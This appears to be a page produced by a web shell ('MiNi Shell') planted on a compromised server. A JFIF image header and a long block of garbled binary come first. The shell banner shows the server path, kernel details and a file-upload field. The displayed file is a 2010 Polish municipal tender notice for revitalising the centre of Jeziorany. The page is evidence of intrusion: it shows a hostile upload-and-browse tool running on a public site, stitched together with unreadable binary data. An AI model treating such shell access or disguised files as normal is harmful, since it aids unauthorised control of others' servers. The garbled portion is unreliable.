JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100415/85867-N-2010.html

<p class="kh_header"><b>Jeziorany: Wykonanie projektu budowlanego i wykonawczego
na Rewitalizację śródmieścia miasta Jeziorany</b><br>
<b>Numer ogłoszenia: 85867 - 2010; data zamieszczenia: 15.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jeziorany reprezentowana przez Burmistrza Jezioran , Plac Zamkowy 4, 11-320 Jeziorany, woj. warmińsko-mazurskie, tel. 089 5392748, faks 089 5392760.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.jeziorany.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu budowlanego i wykonawczego
na Rewitalizację śródmieścia miasta Jeziorany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia.
Przedmiotem zamówienia jest usługa na  wykonanie projektu budowlanego i wykonawczego dla zadania Rewitalizacja śródmieścia miasta Jeziorany wraz z innymi opracowaniami pozwalającymi na kompletną realizację zadania, które zostało określone w tytule przedmiotu zamówienia oraz uzyskanie pozwolenia na budowę.
W szczególności zamówienie obejmuje wykonanie dokumentacji na przebudowę systemu kanalizacji sanitarnej i wodociągowej, budowę i przebudowę kanalizacji deszczowej, przebudowę oświetlenia ulicznego oraz przebudowę ulic i chodników w rejonie zespołu Starego Miasta wraz z zamkiem i fosą oraz rzeką w obrębie przyległym do starówki i terenu byłego stawu młyńskiego. Ponadto zamówienie obejmuje opracowanie dokumentacji na budowę amfiteatru w miejscu istniejącego amfiteatru oraz opracowanie dokumentacji na zagospodarowanie fosy na podstawie  posiadanej przez Zamawiającego koncepcji architektonistycznej i dokumentacji na przebudowę elewacji budynku przy Placu Zamkowym 4.
a. Szacunkowe, minimalne ilości sieci, dróg, placów i obiektów budowlanych  do zaprojektowania zadania   Rewitalizacja śródmieścia miasta Jeziorany
1. Sieć kanalizacji sanitarnej ( przebudowa)
a.      Sieć kanalizacyjna główna 200 mm - 790 mb
b.	Przykanaliki 160 mm - 97 mb
c.	Studnie kanalizacyjne 1200 mm - 27 szt
2. Sieć wodociągowa (przebudowa) 
a.	Sieć wodociągowa główna 160 mm- 960 mb
b.	Sieć wodociągowa główna 110 mm - 975 mb
c.	Przyłącza wodociągowe 32 -50 mm - 364 mb
d.	Hydranty 90 mm - 9 mb
e.	Zasuwy główne - 21 szt
3. Sieć kanalizacji deszczowej (budowa)
a.	Sieć kanalizacji deszczowej główna - 1017 mb
b.	Studnie rewizyjne -  1000 mm - 7 szt
c.	Studnie z wpustem ulicznym 500 mm - 32 szt
4. Drogi i place  w śródmieściu 
a.	Powierzchnia jezdni - 13551 m2
b.	Powierzchnia chodników - 3557 m2
c.	Powierzchnie nieutwardzone - 3225 m2
d.	Oświetlenie uliczne - wykonanie oświetlenia parkowego 
5. Fosa 
a.	Ciągi piesze - 7000 m2
b.	Place, boiska - 3740 m2
c.	Urządzenie zieleni - 45000 m2
d.	Melioracja - 55740 m2
e.	Oświetlenie uliczne - wykonanie oświetlenia parkowego
6. Siedziba Urzędu Miejskiego - budynek Plac Zamkowy 4 i 5
a.	Elewacja - 800 m2
7. Amfiteatr  za Urzędem Miejskim (przebudowa)
a.	Przebudowa sceny -  168 m2
b.	przebudowa widowni -  440 m2  
8.  Nieprzewidziane wyżej a  niezbędne do zaprojektowania i zawarte w Koncepcji Fosy
9. Koncepcja  rewitalizacji śródmieścia Jezioran, którą należy uzgodnić z Zamawiającym przed wykonaniem projektu.
10.W sporządzaniu  oferty i wykonaniu zamówienia należy uwzględnić Koncepcję zagospodarowania fosy jako obowiązkową
b. Opis przedmiotu zamówienia w załącznikach:
- W załączniku graficznym zlokalizowany jest obszar przedmiotu zamówienia. (zał. Nr 7)
- Koncepcja Fosy( rysunki) - zał. nr 8
- Koncepcja Fosy(opis) - zał. nr 9
2. Parametry projektowania:
 Dokumentację należy sporządzić zgodnie z warunkami technicznymi określonymi przez Zamawiającego oraz obowiązującymi w tym zakresie przepisami prawa i aktualnymi normami. W przypadku budowy i przebudowy przedmiotu zamówienia przyjęte do projektowania parametry muszą odpowiadać wymaganiom określonym w obowiązujących przepisach dotyczących w szczególności:
a.     warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie,
        b.   warunków technicznych, jakim powinny odpowiadać  budynki i ich usytuowanie, 
c.	warunków techn. jakim powinny odpowiadać  drogowe obiekty inżynierskie i ich usytuowanie,
d.	uzgadniania projektu budowlanego pod wzglądem ochrony przeciwpożarowej,
e.	szczegółowego zakresu i formy projektu budowlanego ,
f.	informacja dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia,
g.	określenia metod i podstaw sporządzania kosztorysu inwestorskiego,
h.	szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania  i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego,
i.	ochrony środowiska.
3. Materiały do projektowania 
Zamawiający posiada aktualną mapę  zasadniczą w skali 1:500 w wersji papierowej i elektronicznej, którą przekaże Wykonawcy. 
a. Na pisemny wniosek Wykonawcy Zamawiający dostarczy:
1.  upoważnienie do występowania w imieniu Zamawiającego do zainteresowanych jednostek i instytucji w sprawach związanych z przedmiotem zamówienia,
2.  oświadczenie o prawie  dysponowania nieruchomością na cele budowlane.
b. Wykonawca zobowiązany jest we własnym zakresie (i na własny koszt)uzyskać:
1.  decyzję o pozwoleniu na budowę,
2. decyzję o lokalizacji inwestycji celu publicznego , wykonawca przygotuje i wypełni wymagany przepisami prawa wniosek o wydanie przedmiotowej decyzji wraz ze wszystkimi załącznikami,
3. decyzję o środowiskowych uwarunkowaniach realizacji robót,
4. wykaz podmiotów władających działkami wraz z opisem użytku oraz informacje o dzierżawach,
5. dodatkowe mapy do celów projektowych , jeżeli będzie wymagać tego zamówienie( Zamawiający posiada aktualną mapę  zasadniczą w skali 1:500 w wersji papierowej i elektronicznej, którą przekaże Wykonawcy). Dodatkowe pomiary Wykonawca sporządza we własnym zakresie,
6. warunki do sporządzenia projektu urządzenia zieleni i gospodarki drzewostanem oraz uzgodnienia dokumentacji,
7. warunki do projektowania oraz uzgodnienia sporządzonej dokumentacji od administratorów  i właścicieli terenów i dysponentów sieci i urządzeń podziemnych - dotyczące wszystkich branż,
8. uzgodnienie projektowanych i przebudowywanych sieci infrastruktury podziemnej przez Zespół Uzgadniania Dokumentacji Projektowej ,
9. uzgodnienie dokumentacji z konserwatorem zabytków, 
10. uzgodnienie z Powiatowym Inspektorem Sanitarnym - o ile jest wymagane.
c. Uwagi.
Zaleca się aby Wykonawca dokonał wizji w terenie planowanego zamierzenia  objętego zamówieniem oraz uzyskać wszystkie niezbędne informacje do przygotowania kompletnej oferty na przedmiot zamówienia.
4. Szczegóły dotyczące opracowania dokumentacji.
Przed uzgodnieniem przyjętych rozwiązań projektowych Wykonawca powinien dokonać  szacunkowej wyceny proponowanych rozwiązań. Ponadto na każdym etapie opracowywania dokumentacji należy uzyskać stosowne uzgodnienia przyjętych rozwiązań projektowych od Zamawiającego przekładając do uzgodnienia proponowane rozwiązania projektowe.
5. Dokumentacja projektowo - budowlana winna być wykonana w kompletnych 5 egzemplarzach w wersji papierowej  i winna zawierać:
a. Inwentaryzację wraz z opisem stanu istniejącego.
b. Dokumentację geotechniczną.
c. Operat wodno-prawny.
d. Projekty  branżowe:
- architektonistyczna
- konstrukcyjno - budowlana 
- drogowa
- instalacyjna: sieci kanalizacji sanitarnej, sieci kanalizacji deszczowej, sieci wodociągowej, sieci elektroenergetycznej, sieci telekomunikacji, sieci cieplnej i innych.
e. Inwentaryzację zieleni,, projekt urządzenia zieleni i nasadzeń.
f. Specyfikacje techniczne wykonania i odbioru robót ( niepodpuszczalne jest dostarczenie specyfikacji wykonania i odbioru robót w formie opublikowanych ogólnych technicznych tzw. Gotowce). 
g. Projekt stałej organizacji ruchu.
h. Informacje dotyczące bezpieczeństwa i ochrony zdrowia.
i. Przedmiary robót i kosztorys(y) inwestorski(e) - 2 egzemplarze w wersji papierowej.

6.Wymagania  dotyczące formy elektronicznej dokumentacji( 2 egzemplarze)
Wymaga się, aby całość projektowej dokumentacji budowlanej została opracowana w technice cyfrowej i została dołączona do projektu na nośnikach informatycznych (płyta CD-R). Dopuszczalnym formatami plików są : 

a. wszystkie pliki ( za wyjątkiem kosztorysu inwestorskiego) w formacie pdf -w celu umieszczenia na stronie internetowej Zamawiającego jako załącznik do SIWZ przetargu na wykonanie robót, oraz dodatkowo na oddzielnej płycie: 

1.dla dokumentów tekstowych formaty: doc, rtf , 

2.dla arkuszy kalkulacyjnych formaty: xls, xlm), 

3.dla kosztorysów   formaty:   kst,  ath,  prz,  ksp  ,

4.dla rysunków i map formaty: dwg, . 

b. Dane  na  płycie  CD  (lub  2-ch  płytach)  należy  bezwzględnie  pogrupować  w  następujących  katalogach i podkatalogach: 
     1. Dokumentacja techniczna ( w PDF)
     2. Projekt budowlany
3.	Projekty wykonawcze ( powinien zawiera podkatalogi z projektami branżowymi)
4.	Szczegółowe Specyfikacje Techniczne (opracowanie spójne dla wszystkich branż)
      5.    Przedmiar robót (spójny dla wszystkich branż)

c. Forma  elektroniczna  dokumentacji  powinna  zawierać wszystkie  strony  dokumentacji  sporządzonej w formie papierowej i być jej dokładnym odwzorowaniem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia, zamawiający żąda by wykazał, iż wykonał  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie, z należytą starannością - co najmniej:
- udokumentują wykonanie 1 projektu budowlano -wykonawczego zawierającego  branże występujące w przedmiocie zamówienia
lub
po 1  projekcie z każdej z każdej branży,tak aby łącznie spełniały warunek.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający żąda, by wykonawca wykazał co najmniej, że:
- Mają do dyspozycji osoby posiadające uprawnienia do projektowania w zakresie przedmiotu zamówienia tj. :
a. 1 osobę posiadającą uprawnienia w specjalności architektonicznej,
b. 1 osobę posiadającą uprawnienia w specjalności konstrukcyjno- budowlanej,
c. 1 osobę posiadająca uprawnienia w specjalności drogowej,
d.1 osobę posiadająca uprawnienia w specjalności  telekomunikacyjnej,
e. 1 osobę posiadająca uprawnienia w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
f. 1 osobę posiadająca uprawnienia w specjalności  instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz oferty z wykorzystaniem wzoru - załącznik nr 1 do siwz
2.Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z  art. 22 ust. 1 ustawy - Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2 do siwz.
3.Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.
4.Kalkulacja zamówienia - zał. nr 4 do siwz.
5.Harmonogram realizacji zadania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
1.1	zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy a dotyczących opóźnień w wydaniu:
a. prawomocnej decyzji celu publicznego,
b. prawomocnej decyzji środowiskowej,
c. uzgodnień z Wojewódzkim Konserwatorem Ochrony Zabytków.
1.2	zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy;
1.3	wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.
2.Zmiany o których mowa w pkt. 1 dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jeziorany.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nieodpłatnie na stronie internetowej Zamawiającego lub w siedzibie Zamawiającego w godzinach pracu urzędu pokój nr 6 i 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2010 godzina 10:00, miejsce: Oferty winny być złożone w siedzibie Zamawiającego w Urzędzie Miejskim w Jezioranach, Plac Zamkowy 4, w sekretariacie  pok. Nr 19, (I piętro),  w dni pracy urzędu, w godz. 7:30 - 15:30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com